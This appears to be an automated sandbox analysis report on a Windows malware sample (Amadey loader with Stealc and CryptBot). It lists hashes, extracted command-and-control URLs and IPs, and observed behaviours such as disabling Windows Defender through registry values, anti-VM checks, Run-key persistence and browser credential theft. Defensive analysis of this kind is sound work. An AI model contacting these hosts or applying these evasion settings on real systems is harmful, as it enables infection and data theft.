Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 19:10
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
1.8MB
-
MD5
873f4ff6922f79aca237323377183153
-
SHA1
c0e782ab9058afb71626fae94fdd996cbeda934a
-
SHA256
bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271
-
SHA512
7fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8
-
SSDEEP
49152:Kpe2Nf+D/CmuxmmCTHmn0sPx6rvwEyw1lkpR4Yk4Pbdt50O:R21ya98mYUPoroVslWuLebdb
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
resource yara_rule behavioral2/memory/2224-411-0x0000000069CC0000-0x000000006A71B000-memory.dmp family_cryptbot_v3 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 6e351fa038.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e08b96fbcb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 25b65f1027.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6e351fa038.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9e75be4c98.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 219 5632 powershell.exe 220 5604 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1500 chrome.exe 5824 chrome.exe 1092 chrome.exe 5992 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e08b96fbcb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9e75be4c98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6e351fa038.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e08b96fbcb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 25b65f1027.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6e351fa038.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 25b65f1027.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9e75be4c98.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation e08b96fbcb.exe -
Executes dropped EXE 16 IoCs
pid Process 4632 skotes.exe 2536 skotes.exe 2224 e08b96fbcb.exe 876 25b65f1027.exe 1556 9e75be4c98.exe 4316 f7af1ddf66.exe 4356 6e351fa038.exe 5548 skotes.exe 620 FunnyJellyfish.exe 1632 FunnyJellyfish.tmp 2356 file.exe 5804 FunnyJellyfish.exe 2028 FunnyJellyfish.tmp 6928 service123.exe 7804 skotes.exe 6080 service123.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 9e75be4c98.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 25b65f1027.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine 6e351fa038.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine e08b96fbcb.exe -
Loads dropped DLL 4 IoCs
pid Process 5192 regsvr32.exe 6932 regsvr32.exe 6928 service123.exe 6080 service123.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 6e351fa038.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6e351fa038.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f7af1ddf66.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008002001\\f7af1ddf66.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6e351fa038.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008003001\\6e351fa038.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\25b65f1027.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008000001\\25b65f1027.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e75be4c98.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008001001\\9e75be4c98.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to execute payload.
pid Process 8044 powershell.exe 2660 powershell.exe 5604 powershell.exe 5632 powershell.exe 2660 powershell.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023cc1-93.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1664 file.exe 4632 skotes.exe 2536 skotes.exe 2224 e08b96fbcb.exe 876 25b65f1027.exe 1556 9e75be4c98.exe 4356 6e351fa038.exe 5548 skotes.exe 7804 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5632 set thread context of 6124 5632 powershell.exe 142 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5944 2224 WerFault.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6e351fa038.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e08b96fbcb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25b65f1027.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e75be4c98.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f7af1ddf66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e08b96fbcb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e08b96fbcb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5396 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4572 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 4988 taskkill.exe 184 taskkill.exe 4620 taskkill.exe 4708 taskkill.exe 4228 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7444 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 1664 file.exe 1664 file.exe 4632 skotes.exe 4632 skotes.exe 2536 skotes.exe 2536 skotes.exe 2224 e08b96fbcb.exe 2224 e08b96fbcb.exe 876 25b65f1027.exe 876 25b65f1027.exe 1556 9e75be4c98.exe 1556 9e75be4c98.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4356 6e351fa038.exe 4356 6e351fa038.exe 4356 6e351fa038.exe 4356 6e351fa038.exe 4356 6e351fa038.exe 5548 skotes.exe 5548 skotes.exe 1500 chrome.exe 1500 chrome.exe 5632 powershell.exe 5632 powershell.exe 5604 powershell.exe 5604 powershell.exe 5632 powershell.exe 5604 powershell.exe 2028 FunnyJellyfish.tmp 2028 FunnyJellyfish.tmp 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 8044 powershell.exe 8044 powershell.exe 8044 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 6932 regsvr32.exe 7804 skotes.exe 7804 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4228 taskkill.exe Token: SeDebugPrivilege 4988 taskkill.exe Token: SeDebugPrivilege 184 taskkill.exe Token: SeDebugPrivilege 4620 taskkill.exe Token: SeDebugPrivilege 4708 taskkill.exe Token: SeDebugPrivilege 2180 firefox.exe Token: SeDebugPrivilege 2180 firefox.exe Token: SeDebugPrivilege 4356 6e351fa038.exe Token: SeShutdownPrivilege 1500 chrome.exe Token: SeCreatePagefilePrivilege 1500 chrome.exe Token: SeDebugPrivilege 5632 powershell.exe Token: SeDebugPrivilege 5604 powershell.exe Token: SeDebugPrivilege 6124 RegSvcs.exe Token: SeDebugPrivilege 8044 powershell.exe Token: SeIncreaseQuotaPrivilege 8044 powershell.exe Token: SeSecurityPrivilege 8044 powershell.exe Token: SeTakeOwnershipPrivilege 8044 powershell.exe Token: SeLoadDriverPrivilege 8044 powershell.exe Token: SeSystemProfilePrivilege 8044 powershell.exe Token: SeSystemtimePrivilege 8044 powershell.exe Token: SeProfSingleProcessPrivilege 8044 powershell.exe Token: SeIncBasePriorityPrivilege 8044 powershell.exe Token: SeCreatePagefilePrivilege 8044 powershell.exe Token: SeBackupPrivilege 8044 powershell.exe Token: SeRestorePrivilege 8044 powershell.exe Token: SeShutdownPrivilege 8044 powershell.exe Token: SeDebugPrivilege 8044 powershell.exe Token: SeSystemEnvironmentPrivilege 8044 powershell.exe Token: SeRemoteShutdownPrivilege 8044 powershell.exe Token: SeUndockPrivilege 8044 powershell.exe Token: SeManageVolumePrivilege 8044 powershell.exe Token: 33 8044 powershell.exe Token: 34 8044 powershell.exe Token: 35 8044 powershell.exe Token: 36 8044 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeIncreaseQuotaPrivilege 2660 powershell.exe Token: SeSecurityPrivilege 2660 powershell.exe Token: SeTakeOwnershipPrivilege 2660 powershell.exe Token: SeLoadDriverPrivilege 2660 powershell.exe Token: SeSystemProfilePrivilege 2660 powershell.exe Token: SeSystemtimePrivilege 2660 powershell.exe Token: SeProfSingleProcessPrivilege 2660 powershell.exe Token: SeIncBasePriorityPrivilege 2660 powershell.exe Token: SeCreatePagefilePrivilege 2660 powershell.exe Token: SeBackupPrivilege 2660 powershell.exe Token: SeRestorePrivilege 2660 powershell.exe Token: SeShutdownPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeSystemEnvironmentPrivilege 2660 powershell.exe Token: SeRemoteShutdownPrivilege 2660 powershell.exe Token: SeUndockPrivilege 2660 powershell.exe Token: SeManageVolumePrivilege 2660 powershell.exe Token: 33 2660 powershell.exe Token: 34 2660 powershell.exe Token: 35 2660 powershell.exe Token: 36 2660 powershell.exe Token: SeIncreaseQuotaPrivilege 2660 powershell.exe Token: SeSecurityPrivilege 2660 powershell.exe Token: SeTakeOwnershipPrivilege 2660 powershell.exe Token: SeLoadDriverPrivilege 2660 powershell.exe Token: SeSystemProfilePrivilege 2660 powershell.exe Token: SeSystemtimePrivilege 2660 powershell.exe Token: SeProfSingleProcessPrivilege 2660 powershell.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 1664 file.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 